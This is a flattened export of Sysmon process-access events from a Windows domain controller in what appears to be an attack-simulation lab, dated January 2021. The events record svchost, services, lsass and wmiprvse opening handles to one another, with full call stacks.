13:36:16.429{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.288{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.288{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.288{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.195{59A5CD1D-8E46-6005-1200-00000000A301}12121384C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.179{59A5CD1D-8E46-6005-1200-00000000A301}12121384C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.163{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.163{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.163{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.445{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.445{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.445{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.398{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.398{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.398{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.383{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.383{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.383{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.367{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.367{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 